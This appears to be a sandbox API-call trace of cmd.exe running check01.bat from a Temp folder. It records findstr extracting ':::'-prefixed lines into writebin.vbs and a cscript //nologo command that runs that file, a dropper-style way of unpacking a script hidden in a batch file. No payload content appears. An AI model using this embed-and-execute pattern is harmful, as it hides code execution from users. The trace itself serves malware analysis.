[0375.751] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x1ee0e0 | out: lpFindFileData=0x1ee0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf63dd9e0, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0xf63dd9e0, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3ff, cFileName="Temp", cAlternateFileName="")) returned 0x22e840
[0375.751] FindClose (in: hFindFile=0x22e840 | out: hFindFile=0x22e840) returned 1
[0375.751] memcpy (in: _Dst=0x1ee880, _Src=0x1ee10c, _Size=0x8 | out: _Dst=0x1ee880) returned 0x1ee880
[0375.751] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), lpFindFileData=0x1ee0e0 | out: lpFindFileData=0x1ee0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf63dd9e0, ftCreationTime.dwHighDateTime=0x1dab598, ftLastAccessTime.dwLowDateTime=0xf63dd9e0, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0x99073dc0, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0xf32, dwReserved0=0x0, dwReserved1=0x3ff, cFileName="check01.bat", cAlternateFileName="")) returned 0x22e840
[0375.751] FindClose (in: hFindFile=0x22e840 | out: hFindFile=0x22e840) returned 1
[0375.752] memcpy (in: _Dst=0x1ee88a, _Src=0x1ee10c, _Size=0x16 | out: _Dst=0x1ee88a) returned 0x1ee88a
[0375.752] GetProcessHeap () returned 0x200000
[0375.752] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x72) returned 0x22e840
[0375.752] GetProcessHeap () returned 0x200000
[0375.752] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x22e8c0
[0375.753] GetProcessHeap () returned 0x200000
[0375.753] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b090
[0375.753] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0375.753] GetProcessHeap () returned 0x200000
[0375.753] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0375.754] GetProcessHeap () returned 0x200000
[0375.754] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22e8c0 | out: hHeap=0x200000) returned 1
[0375.754] GetProcessHeap () returned 0x200000
[0375.755] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a820 | out: hHeap=0x200000) returned 1
[0375.755] _tell (_FileHandle=3) returned 3038
[0375.755] _close (_FileHandle=3) returned 0
[0375.755] _wcsicmp (_String1="findstr", _String2="DIR") returned 2
[0375.755] _wcsicmp (_String1="findstr", _String2="ERASE") returned 1
[0375.755] _wcsicmp (_String1="findstr", _String2="DEL") returned 2
[0375.756] _wcsicmp (_String1="findstr", _String2="TYPE") returned -14
[0375.756] _wcsicmp (_String1="findstr", _String2="COPY") returned 3
[0375.756] _wcsicmp (_String1="findstr", _String2="CD") returned 3
[0375.756] _wcsicmp (_String1="findstr", _String2="CHDIR") returned 3
[0375.756] _wcsicmp (_String1="findstr", _String2="RENAME") returned -12
[0375.756] _wcsicmp (_String1="findstr", _String2="REN") returned -12
[0375.756] _wcsicmp (_String1="findstr", _String2="ECHO") returned 1
[0375.756] _wcsicmp (_String1="findstr", _String2="SET") returned -13
[0375.756] _wcsicmp (_String1="findstr", _String2="PAUSE") returned -10
[0375.756] _wcsicmp (_String1="findstr", _String2="DATE") returned 2
[0375.756] _wcsicmp (_String1="findstr", _String2="TIME") returned -14
[0375.756] _wcsicmp (_String1="findstr", _String2="PROMPT") returned -10
[0375.756] _wcsicmp (_String1="findstr", _String2="MD") returned -7
[0375.756] _wcsicmp (_String1="findstr", _String2="MKDIR") returned -7
[0375.756] _wcsicmp (_String1="findstr", _String2="RD") returned -12
[0375.757] _wcsicmp (_String1="findstr", _String2="RMDIR") returned -12
[0375.757] _wcsicmp (_String1="findstr", _String2="PATH") returned -10
[0375.757] _wcsicmp (_String1="findstr", _String2="GOTO") returned -1
[0375.757] _wcsicmp (_String1="findstr", _String2="SHIFT") returned -13
[0375.757] _wcsicmp (_String1="findstr", _String2="CLS") returned 3
[0375.757] _wcsicmp (_String1="findstr", _String2="CALL") returned 3
[0375.757] _wcsicmp (_String1="findstr", _String2="VERIFY") returned -16
[0375.757] _wcsicmp (_String1="findstr", _String2="VER") returned -16
[0375.757] _wcsicmp (_String1="findstr", _String2="VOL") returned -16
[0375.757] _wcsicmp (_String1="findstr", _String2="EXIT") returned 1
[0375.757] _wcsicmp (_String1="findstr", _String2="SETLOCAL") returned -13
[0375.757] _wcsicmp (_String1="findstr", _String2="ENDLOCAL") returned 1
[0375.757] _wcsicmp (_String1="findstr", _String2="TITLE") returned -14
[0375.757] _wcsicmp (_String1="findstr", _String2="START") returned -13
[0375.757] _wcsicmp (_String1="findstr", _String2="DPATH") returned 2
[0375.757] _wcsicmp (_String1="findstr", _String2="KEYS") returned -5
[0375.757] _wcsicmp (_String1="findstr", _String2="MOVE") returned -7
[0375.758] _wcsicmp (_String1="findstr", _String2="PUSHD") returned -10
[0375.758] _wcsicmp (_String1="findstr", _String2="POPD") returned -10
[0375.758] _wcsicmp (_String1="findstr", _String2="ASSOC") returned 5
[0375.758] _wcsicmp (_String1="findstr", _String2="FTYPE") returned -11
[0375.758] _wcsicmp (_String1="findstr", _String2="BREAK") returned 4
[0375.758] _wcsicmp (_String1="findstr", _String2="COLOR") returned 3
[0375.758] _wcsicmp (_String1="findstr", _String2="MKLINK") returned -7
[0375.758] SetErrorMode (uMode=0x0) returned 0x0
[0375.758] SetErrorMode (uMode=0x1) returned 0x0
[0375.758] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x21cf90, lpFilePart=0x1eed10 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1eed10*="system32") returned 0x13
[0375.758] SetErrorMode (uMode=0x0) returned 0x1
[0375.759] GetProcessHeap () returned 0x200000
[0375.759] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21cf80, Size=0x48) returned 0x21cf80
[0375.759] GetProcessHeap () returned 0x200000
[0375.759] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21cf80) returned 0x48
[0375.759] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0375.759] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0375.759] GetProcessHeap () returned 0x200000
[0375.759] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1ce) returned 0x21cfe0
[0375.759] GetProcessHeap () returned 0x200000
[0375.759] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x38c) returned 0x21d1c0
[0375.760] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21d1c0, Size=0x1d0) returned 0x21d1c0
[0375.760] GetProcessHeap () returned 0x200000
[0375.760] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21d1c0) returned 0x1d0
[0375.760] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0375.760] GetProcessHeap () returned 0x200000
[0375.760] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xe8) returned 0x21d3a0
[0375.760] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21d3a0, Size=0x7e) returned 0x21d3a0
[0375.760] GetProcessHeap () returned 0x200000
[0375.760] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21d3a0) returned 0x7e
[0375.760] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0375.760] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\findstr.*" (normalized: "c:\\windows\\system32\\findstr.*"), fInfoLevelId=0x1, lpFindFileData=0x1eea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea80) returned 0x21d430
[0375.761] GetProcessHeap () returned 0x200000
[0375.761] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x2146e0, Size=0x8) returned 0x21ba00
[0375.761] FindClose (in: hFindFile=0x21d430 | out: hFindFile=0x21d430) returned 1
[0375.761] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\findstr.COM" (normalized: "c:\\windows\\system32\\findstr.com"), fInfoLevelId=0x1, lpFindFileData=0x1eea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea80) returned 0xffffffffffffffff
[0375.761] GetLastError () returned 0x2
[0375.761] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\findstr.EXE" (normalized: "c:\\windows\\system32\\findstr.exe"), fInfoLevelId=0x1, lpFindFileData=0x1eea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea80) returned 0x21d430
[0375.762] FindClose (in: hFindFile=0x21d430 | out: hFindFile=0x21d430) returned 1
[0375.762] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0375.762] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0375.762] _get_osfhandle (_FileHandle=1) returned 0x7
[0375.762] _get_osfhandle (_FileHandle=1) returned 0x7
[0375.762] _get_osfhandle (_FileHandle=1) returned 0x7
[0375.762] GetFileType (hFile=0x7) returned 0x2
[0375.763] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0375.763] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eec98 | out: lpMode=0x1eec98) returned 1
[0375.764] _dup (_FileHandle=1) returned 3
[0375.764] _close (_FileHandle=1) returned 0
[0375.765] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs", _String2="con") returned -53
[0375.765] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\writebin.vbs"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1eec48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c
[0375.767] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 1
[0375.767] GetConsoleTitleW (in: lpConsoleTitle=0x1eecd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0375.768] SetErrorMode (uMode=0x0) returned 0x0
[0375.768] SetErrorMode (uMode=0x1) returned 0x0
[0375.768] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x21d720, lpFilePart=0x1ee560 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ee560*="system32") returned 0x13
[0375.768] SetErrorMode (uMode=0x0) returned 0x1
[0375.769] GetProcessHeap () returned 0x200000
[0375.769] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21d710, Size=0x48) returned 0x21d710
[0375.769] GetProcessHeap () returned 0x200000
[0375.769] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21d710) returned 0x48
[0375.769] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0375.769] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0375.769] GetProcessHeap () returned 0x200000
[0375.769] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1ce) returned 0x21d770
[0375.769] GetProcessHeap () returned 0x200000
[0375.769] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x38c) returned 0x21d950
[0375.769] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21d950, Size=0x1d0) returned 0x21d950
[0375.769] GetProcessHeap () returned 0x200000
[0375.770] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21d950) returned 0x1d0
[0375.770] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0375.770] GetProcessHeap () returned 0x200000
[0375.770] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xe8) returned 0x21db30
[0375.770] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21db30, Size=0x7e) returned 0x21db30
[0375.770] GetProcessHeap () returned 0x200000
[0375.770] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21db30) returned 0x7e
[0375.770] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0375.770] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\findstr.*" (normalized: "c:\\windows\\system32\\findstr.*"), fInfoLevelId=0x1, lpFindFileData=0x1ee2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee2d0) returned 0x21dbc0
[0375.770] FindClose (in: hFindFile=0x21dbc0 | out: hFindFile=0x21dbc0) returned 1
[0375.771] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\findstr.COM" (normalized: "c:\\windows\\system32\\findstr.com"), fInfoLevelId=0x1, lpFindFileData=0x1ee2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee2d0) returned 0xffffffffffffffff
[0375.771] GetLastError () returned 0x2
[0375.771] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\findstr.EXE" (normalized: "c:\\windows\\system32\\findstr.exe"), fInfoLevelId=0x1, lpFindFileData=0x1ee2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee2d0) returned 0x21dbc0
[0375.771] FindClose (in: hFindFile=0x21dbc0 | out: hFindFile=0x21dbc0) returned 1
[0375.771] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0375.771] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0375.771] GetConsoleTitleW (in: lpConsoleTitle=0x1ee820, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0375.772] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ee5d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ee598 | out: lpAttributeList=0x1ee5d8, lpSize=0x1ee598) returned 1
[0375.772] UpdateProcThreadAttribute (in: lpAttributeList=0x1ee5d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ee588, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ee5d8, lpPreviousValue=0x0) returned 1
[0375.772] GetStartupInfoW (in: lpStartupInfo=0x1ee6f0 | out: lpStartupInfo=0x1ee6f0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0375.772] lstrcmpW (lpString1="\\findstr.exe", lpString2="\\XCOPY.EXE") returned -1
[0375.775] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\findstr.exe", lpCommandLine="findstr /r \"^[^a-z]*:::\" \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1ee610*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="findstr /r \"^[^a-z]*:::\" \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ee5c0 | out: lpCommandLine="findstr /r \"^[^a-z]*:::\" \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\" ", lpProcessInformation=0x1ee5c0*(hProcess=0x64, hThread=0x60, dwProcessId=0xc2c, dwThreadId=0xc30)) returned 1
[0375.786] CloseHandle (hObject=0x60) returned 1
[0375.786] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0375.786] GetProcessHeap () returned 0x200000
[0375.786] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21ba30 | out: hHeap=0x200000) returned 1
[0375.787] GetEnvironmentStringsW () returned 0x21ba30*
[0375.787] GetProcessHeap () returned 0x200000
[0375.787] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb78) returned 0x21dd40
[0375.787] memcpy (in: _Dst=0x21dd40, _Src=0x21ba30, _Size=0xb78 | out: _Dst=0x21dd40) returned 0x21dd40
[0375.787] FreeEnvironmentStringsW (penv=0x21ba30) returned 1
[0375.787] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0
[0375.951] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x1ee508 | out: lpExitCode=0x1ee508*=0x0) returned 1
[0375.952] CloseHandle (hObject=0x64) returned 1
[0375.952] _vsnwprintf (in: _Buffer=0x1ee778, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ee518 | out: _Buffer="00000000") returned 8
[0375.952] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
[0375.952] GetProcessHeap () returned 0x200000
[0375.952] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21dd40 | out: hHeap=0x200000) returned 1
[0375.952] GetEnvironmentStringsW () returned 0x21f470*
[0375.953] GetProcessHeap () returned 0x200000
[0375.953] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb9e) returned 0x22a820
[0375.953] memcpy (in: _Dst=0x22a820, _Src=0x21f470, _Size=0xb9e | out: _Dst=0x22a820) returned 0x22a820
[0375.953] FreeEnvironmentStringsW (penv=0x21f470) returned 1
[0375.953] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
[0375.953] GetProcessHeap () returned 0x200000
[0375.953] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a820 | out: hHeap=0x200000) returned 1
[0375.953] GetEnvironmentStringsW () returned 0x21f470*
[0375.953] GetProcessHeap () returned 0x200000
[0375.953] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb9e) returned 0x22a820
[0375.953] memcpy (in: _Dst=0x22a820, _Src=0x21f470, _Size=0xb9e | out: _Dst=0x22a820) returned 0x22a820
[0375.953] FreeEnvironmentStringsW (penv=0x21f470) returned 1
[0375.953] GetProcessHeap () returned 0x200000
[0375.954] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a390 | out: hHeap=0x200000) returned 1
[0375.954] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ee5d8 | out: lpAttributeList=0x1ee5d8)
[0375.954] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0375.957] _close (_FileHandle=3) returned 0
[0375.958] _get_osfhandle (_FileHandle=1) returned 0x7
[0375.958] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0375.959] _get_osfhandle (_FileHandle=1) returned 0x7
[0375.959] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0375.960] _get_osfhandle (_FileHandle=0) returned 0x3
[0375.960] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0375.964] SetConsoleInputExeNameW () returned 0x1
[0375.964] GetConsoleOutputCP () returned 0x1b5
[0375.964] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0375.964] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0375.965] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1eef28, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c
[0375.965] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3
[0375.965] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.965] SetFilePointer (in: hFile=0x5c, lDistanceToMove=3038, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbde
[0375.965] GetProcessHeap () returned 0x200000
[0375.966] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21db30 | out: hHeap=0x200000) returned 1
[0375.966] GetProcessHeap () returned 0x200000
[0375.966] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d950 | out: hHeap=0x200000) returned 1
[0375.966] GetProcessHeap () returned 0x200000
[0375.966] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d770 | out: hHeap=0x200000) returned 1
[0375.966] GetProcessHeap () returned 0x200000
[0375.967] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d710 | out: hHeap=0x200000) returned 1
[0375.967] GetProcessHeap () returned 0x200000
[0375.967] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d650 | out: hHeap=0x200000) returned 1
[0375.967] GetProcessHeap () returned 0x200000
[0375.967] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d430 | out: hHeap=0x200000) returned 1
[0375.967] GetProcessHeap () returned 0x200000
[0375.967] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2146e0 | out: hHeap=0x200000) returned 1
[0375.967] GetProcessHeap () returned 0x200000
[0375.967] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d3a0 | out: hHeap=0x200000) returned 1
[0375.967] GetProcessHeap () returned 0x200000
[0375.968] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d1c0 | out: hHeap=0x200000) returned 1
[0375.968] GetProcessHeap () returned 0x200000
[0375.968] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cfe0 | out: hHeap=0x200000) returned 1
[0375.968] GetProcessHeap () returned 0x200000
[0375.968] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cf80 | out: hHeap=0x200000) returned 1
[0375.968] GetProcessHeap () returned 0x200000
[0375.968] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cf00 | out: hHeap=0x200000) returned 1
[0375.968] GetProcessHeap () returned 0x200000
[0375.968] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216cf0 | out: hHeap=0x200000) returned 1
[0375.969] GetProcessHeap () returned 0x200000
[0375.969] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21ce50 | out: hHeap=0x200000) returned 1
[0375.969] GetProcessHeap () returned 0x200000
[0375.969] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0375.969] GetProcessHeap () returned 0x200000
[0375.969] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cd90 | out: hHeap=0x200000) returned 1
[0375.969] GetProcessHeap () returned 0x200000
[0375.969] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22e840 | out: hHeap=0x200000) returned 1
[0375.969] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.970] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbde
[0375.970] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1eed30, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1eed30*=0x354, lpOverlapped=0x0) returned 1
[0375.970] SetFilePointer (in: hFile=0x5c, lDistanceToMove=3094, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc16
[0375.970] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=" cscript //nologo \"%temp%\\writebin.vbs\" \"%~1\" \"%~2\"\r\n", cbMultiByte=56, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr=" cscript //nologo \"%temp%\\writebin.vbs\" \"%~1\" \"%~2\"\r\ns\"\r\n") returned 56
[0375.970] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.970] GetFileType (hFile=0x5c) returned 0x1
[0375.970] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.970] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc16
[0375.970] GetProcessHeap () returned 0x200000
[0375.971] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22b3d0
[0375.971] GetProcessHeap () returned 0x200000
[0375.971] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x22f3f0
[0375.971] GetProcessHeap () returned 0x200000
[0375.971] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b090
[0375.971] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0375.971] GetProcessHeap () returned 0x200000
[0375.971] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0375.971] GetProcessHeap () returned 0x200000
[0375.972] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22f3f0 | out: hHeap=0x200000) returned 1
[0375.973] GetProcessHeap () returned 0x200000
[0375.973] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1e) returned 0x21b090
[0375.973] GetProcessHeap () returned 0x200000
[0375.973] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x6c) returned 0x21dd40
[0375.973] GetProcessHeap () returned 0x200000
[0375.973] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x6a) returned 0x21ddc0
[0375.974] GetProcessHeap () returned 0x200000
[0375.974] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22b3d0 | out: hHeap=0x200000) returned 1
[0375.974] _tell (_FileHandle=3) returned 3094
[0375.974] _close (_FileHandle=3) returned 0
[0375.975] _wcsicmp (_String1="cscript", _String2="DIR") returned -1
[0375.975] _wcsicmp (_String1="cscript", _String2="ERASE") returned -2
[0375.975] _wcsicmp (_String1="cscript", _String2="DEL") returned -1
[0375.975] _wcsicmp (_String1="cscript", _String2="TYPE") returned -17
[0375.975] _wcsicmp (_String1="cscript", _String2="COPY") returned 4
[0375.975] _wcsicmp (_String1="cscript", _String2="CD") returned 15
[0375.975] _wcsicmp (_String1="cscript", _String2="CHDIR") returned 11
[0375.975] _wcsicmp (_String1="cscript", _String2="RENAME") returned -15
[0375.975] _wcsicmp (_String1="cscript", _String2="REN") returned -15
[0375.975] _wcsicmp (_String1="cscript", _String2="ECHO") returned -2
[0375.975] _wcsicmp (_String1="cscript", _String2="SET") returned -16
[0375.975] _wcsicmp (_String1="cscript", _String2="PAUSE") returned -13
[0375.975] _wcsicmp (_String1="cscript", _String2="DATE") returned -1
[0375.976] _wcsicmp (_String1="cscript", _String2="TIME") returned -17
[0375.976] _wcsicmp (_String1="cscript", _String2="PROMPT") returned -13
[0375.976] _wcsicmp (_String1="cscript", _String2="MD") returned -10
[0375.976] _wcsicmp (_String1="cscript", _String2="MKDIR") returned -10
[0375.976] _wcsicmp (_String1="cscript", _String2="RD") returned -15
[0375.976] _wcsicmp (_String1="cscript", _String2="RMDIR") returned -15
[0375.976] _wcsicmp (_String1="cscript", _String2="PATH") returned -13
[0375.976] _wcsicmp (_String1="cscript", _String2="GOTO") returned -4
[0375.976] _wcsicmp (_String1="cscript", _String2="SHIFT") returned -16
[0375.976] _wcsicmp (_String1="cscript", _String2="CLS") returned 7
[0375.976] _wcsicmp (_String1="cscript", _String2="CALL") returned 18
[0375.976] _wcsicmp (_String1="cscript", _String2="VERIFY") returned -19
